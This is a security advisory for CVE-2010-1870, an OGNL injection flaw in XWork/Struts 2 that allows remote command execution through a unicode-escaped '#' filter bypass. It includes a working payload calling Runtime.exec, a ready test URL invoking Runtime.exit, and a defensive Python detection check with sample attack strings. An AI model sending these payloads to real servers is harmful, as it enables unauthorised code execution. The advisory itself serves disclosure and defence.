Affected Systems:
OpenSymphony XWork < 2.2.0
Apache Group Struts < 2.2.0
Description:
CVE ID: CVE-2010-1870
XWork is a command-pattern framework that underlies Struts 2 and other applications.
XWork has a vulnerability in the way it processes user-supplied request parameter data. A remote attacker can exploit it to execute arbitrary commands on the affected system.
Struts 2 (the WebWork framework) uses XWork to perform operations and method calls based on HTTP parameter names. Each HTTP parameter name is evaluated as an OGNL (Object-Graph Navigation Language) statement; for example, OGNL converts the parameters
user.address.city=Bishkek&user[favoriteDrink]=kumys
into the calls
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
This is implemented by ParametersInterceptor, which calls ValueStack.setValue() with the user-supplied HTTP parameter name as the OGNL expression.
In addition to getting and setting properties, OGNL also supports:
* Method calls: foo()
* Static method calls: @java.lang.System@exit(1)
* Constructor calls: new MyClass()
* Context variable handling: #foo = new MyClass()
Because HTTP parameter names are evaluated as OGNL, XWork relies on two protection variables to prevent attackers from invoking arbitrary methods through HTTP parameters:
* the OgnlContext attribute xwork.MethodAccessor.denyMethodExecution (true by default)
* the SecurityMemberAccess private field allowStaticMethodAccess (false by default)
To give developers convenient access to a variety of common objects, XWork provides some predefined context variables:
* #application
* #session
* #request
* #parameters
* #attr
* #context
* #_memberAccess
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
These variables represent various server-side objects. To prevent tampering with them, XWork's ParametersInterceptor rejects any parameter name containing the "#" character. However, if "#" is written as the Java unicode escape \u0023, the check is bypassed and an attacker can modify the values that guard against Java code execution:
#_memberAccess[allowStaticMethodAccess] = true
#foo = new java.lang.Boolean("false")
#context[xwork.MethodAccessor.denyMethodExecution] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec("mkdir /tmp/PWNED")
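The core of the bug is that the "#" filter is a deny-list applied to the raw parameter name, while OGNL decodes \u0023 only later. The following added example (not code from the advisory or from XWork) contrasts that weak check with an allow-list check and uses the difference as a detection rule over constructed query strings; the allow-list regex and the sample queries are this example's own assumptions, not the upstream patch.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample query strings (not captured traffic): a benign one, one
# with the literal "#" that ParametersInterceptor already rejects, and one
# that smuggles "#" and "=" past that check as the OGNL unicode escapes
# \u0023 and \u003d, the bypass described above.
SAMPLE_QUERIES = [
    "user.address.city=Bishkek&user[favoriteDrink]=kumys",
    "#_memberAccess[allowStaticMethodAccess]=true",
    "(\\u0023_memberAccess[allowStaticMethodAccess])(meh)=true"
    "&(asdf)(\\u0023rt\\u003d1)=1",
]

UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")

# Hardened rule (this example's own allow-list, not the upstream patch): only
# dotted identifiers with simple [index] parts are acceptable parameter names.
# "#", "@", "(", quotes and backslashes never match, so escapes fail as well.
ACCEPTED_NAME = re.compile(
    r"[A-Za-z_][A-Za-z0-9_]*(?:\.[A-Za-z_][A-Za-z0-9_]*|\[[A-Za-z0-9_]+\])*"
)

def weak_name_check(name: str) -> bool:
    """Pre-2.2.0 style deny-list: only a literal '#' in the raw name is rejected."""
    return "#" not in name

def decode_ognl_escapes(name: str) -> str:
    """The name as OGNL sees it after decoding \\uXXXX escapes; the weak
    check runs on the raw name and therefore never sees the decoded '#'."""
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), name)

def hardened_name_check(name: str) -> bool:
    """Allow-list check: reject anything that is not a plain property path."""
    return ACCEPTED_NAME.fullmatch(name) is not None

def bypasses_weak_check(query: str) -> list[str]:
    """Parameter names that pass the deny-list but fail the allow-list. As a
    log or WAF rule, anything returned here would have reached
    ValueStack.setValue() on a vulnerable XWork."""
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)
            if weak_name_check(name) and not hardened_name_check(name)]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        for n in bypasses_weak_check(q):
            print(f"reaches OGNL: {n!r} -> decoded {decode_ognl_escapes(n)!r}")
```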
<* Source: Meder Kydyraliev (Bugtraq@web.areopag.net)
Link:
http://secunia.com/advisories/32495/
http://www.exploit-db.com/exploits/14360/
*>
Test method:
Warning
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!
http://mydomain/MyStruts.action?(\u0023_memberAccess[allowStaticMethodAccess])(meh)=true&(aaa)(\u0023context[xwork.MethodAccessor.denyMethodExecution]\u003d\u0023foo)(\u0023foo\u003dnew%20java.lang.Boolean("false"))&(asdf)(\u0023rt.exit(1))(\u0023rt\u003d@java.lang.Runtime@getRuntime())=1
Suggestion:
Vendor patch:
Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://svn.apache.org/viewvc?view=revision&revision=956389